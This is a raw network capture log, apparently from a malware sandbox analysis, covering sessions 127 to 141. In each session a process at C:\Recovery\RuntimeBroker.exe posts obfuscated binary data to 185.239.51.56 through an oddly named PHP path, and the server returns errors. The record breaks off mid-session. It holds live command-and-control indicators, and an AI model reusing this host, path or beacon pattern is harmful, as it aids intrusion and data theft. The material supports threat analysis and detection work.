                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  127192.168.2.450134185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:46.165620089 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:46.519304991 CET1600OUTData Raw: 53 59 5e 50 5f 5d 5b 52 5f 5a 5a 53 57 5a 56 57 5f 58 5d 48 51 54 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^P_][R_ZZSWZVW_X]HQTWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+>Y#"$]1,[:?&?8%Y65)7(+U0('&7."^%#[.*
                                                                                                  Jan 1, 2025 02:28:46.867381096 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:46.875897884 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:46 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  128192.168.2.450135185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:46.288855076 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:46.646106958 CET2504OUTData Raw: 56 5e 5e 52 5f 5a 5b 54 5f 5a 5a 53 57 5b 56 5e 5f 59 5d 40 51 50 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^R_Z[T_ZZSW[V^_Y]@QPWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B<,)6"<&0[,-*=4++9X"C=4;?T0;+%9-"^%#[..
                                                                                                  Jan 1, 2025 02:28:46.990674019 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:46.998455048 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:46 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  129192.168.2.450136185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:47.134264946 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:47.490093946 CET2504OUTData Raw: 53 5e 5b 57 5f 58 5e 54 5f 5a 5a 53 57 5f 56 54 5f 58 5d 46 51 54 57 50 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S^[W_X^T_ZZSW_VT_X]FQTWP^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@<,Z!!$Y'3+/-"<>](+&!%6 +3P$+8\%4&X."^%#[.>
                                                                                                  Jan 1, 2025 02:28:47.835978985 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:47.842993021 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:47 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  130192.168.2.450137185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:47.977180958 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:48.331533909 CET2504OUTData Raw: 56 5a 5e 57 5f 5c 5e 50 5f 5a 5a 53 57 5f 56 53 5f 5c 5d 44 51 52 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^W_\^P_ZZSW_VS_\]DQRWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A(/!"2$Y' '/=+B1*8_!&* ;?P'1')-"^%#[.>
                                                                                                  Jan 1, 2025 02:28:48.697825909 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:48.835150003 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:48 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  131192.168.2.450138185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:48.962456942 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:49.318104982 CET2504OUTData Raw: 53 5f 5e 57 5a 56 5e 50 5f 5a 5a 53 57 5c 56 5f 5f 5e 5d 49 51 57 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: S_^WZV^P_ZZSW\V__^]IQWWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C<?.X!2#8>6?$.+_! +4''&&:"^%#[.2
                                                                                                  Jan 1, 2025 02:28:49.663675070 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:49.672398090 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:49 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  132192.168.2.450139185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:49.806793928 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:50.159722090 CET2504OUTData Raw: 56 5d 5b 55 5a 59 5b 5c 5f 5a 5a 53 57 5b 56 54 5f 54 5d 45 51 55 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V][UZY[\_ZZSW[VT_T]EQUW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['D<_"2+&0+;>6\($+6&*4$;_%$=."^%#[..
                                                                                                  Jan 1, 2025 02:28:50.509098053 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:50.518691063 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:50 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  133192.168.2.450140185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:50.646095991 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:51.003557920 CET2504OUTData Raw: 56 5b 5e 55 5f 5d 5b 57 5f 5a 5a 53 57 5a 56 5e 5f 5e 5d 40 51 5c 57 5d 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[^U_][W_ZZSWZV^_^]@Q\W]^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$<<5T;&U \/>-(4-()X!&)";/']<]&>:="^%#[.*
                                                                                                  Jan 1, 2025 02:28:51.355667114 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:51.371645927 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:51 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  134192.168.2.450141185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:51.503245115 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:51.853039980 CET2504OUTData Raw: 56 5a 5e 57 5a 5a 5e 51 5f 5a 5a 53 57 58 56 57 5f 55 5d 44 51 55 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VZ^WZZ^Q_ZZSWXVW_U]DQUWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A+?2X"10Z&37,-1?"X((265>Y4;#Q'(^24!.="^%#[."


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  135192.168.2.450142185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:51.910878897 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:52.276593924 CET1600OUTData Raw: 56 52 5b 52 5f 5a 5e 56 5f 5a 5a 53 57 51 56 5f 5f 5f 5d 48 51 51 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VR[R_Z^V_ZZSWQV___]HQQW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+*!'23 --5<':X<6!5)4?%+[%29="^%#[.
                                                                                                  Jan 1, 2025 02:28:52.613178968 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:52.621011972 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:52 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  136192.168.2.450143185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:52.158937931 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:52.503444910 CET2504OUTData Raw: 56 59 5e 57 5f 58 5b 51 5f 5a 5a 53 57 5a 56 54 5f 5b 5d 41 51 54 57 58 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: VY^W_X[Q_ZZSWZVT_[]AQTWX^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['D+)! &0X;%+><%_666Z ;?'++%4=:"^%#[.*
                                                                                                  Jan 1, 2025 02:28:52.870223999 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:52.877733946 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:52 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  137192.168.2.450144185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:53.007575989 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:53.362790108 CET2504OUTData Raw: 53 59 5e 5e 5a 5c 5b 53 5f 5a 5a 53 57 5b 56 51 5f 5a 5d 44 51 55 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^^Z\[S_ZZSW[VQ_Z]DQUWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['@(<Z#21/-!(':X+;%Z"5.#(T3;(&'*X."^%#[..
                                                                                                  Jan 1, 2025 02:28:53.722229004 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:53.730906963 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:53 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  138192.168.2.450145185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:53.850507021 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:54.206568956 CET2504OUTData Raw: 56 5b 5b 50 5f 5d 5e 53 5f 5a 5a 53 57 5e 56 53 5f 5e 5d 46 51 57 57 5c 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[[P_]^S_ZZSW^VS_^]FQWW\^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['B?2X!<\'34Z8.?$Y+;%Y!6"Z73'+#22Y.="^%#[.
                                                                                                  Jan 1, 2025 02:28:54.555763006 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:54.563678026 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:54 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  139192.168.2.450146185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:54.741513014 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:55.099294901 CET2504OUTData Raw: 56 5e 5b 53 5f 58 5e 51 5f 5a 5a 53 57 58 56 57 5f 58 5d 40 51 5d 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^[S_X^Q_ZZSWXVW_X]@Q]W_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+<&[62(Z13-=6+$+^)"C-7;/P387$'!:"^%#[."
                                                                                                  Jan 1, 2025 02:28:55.459173918 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:55.469841957 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:55 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  140192.168.2.450147185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:55.600076914 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:28:55.956592083 CET2504OUTData Raw: 53 59 5e 57 5a 56 5e 50 5f 5a 5a 53 57 5e 56 5f 5f 5f 5d 42 51 56 57 5a 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^WZV^P_ZZSW^V___]BQVWZ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['(Z!51/%(8<'-?+>656"+70+4&42Y.="^%#[.
                                                                                                  Jan 1, 2025 02:28:56.310354948 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:28:56.323918104 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:28:56 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  141192.168.2.450148185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:28:56.447338104 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
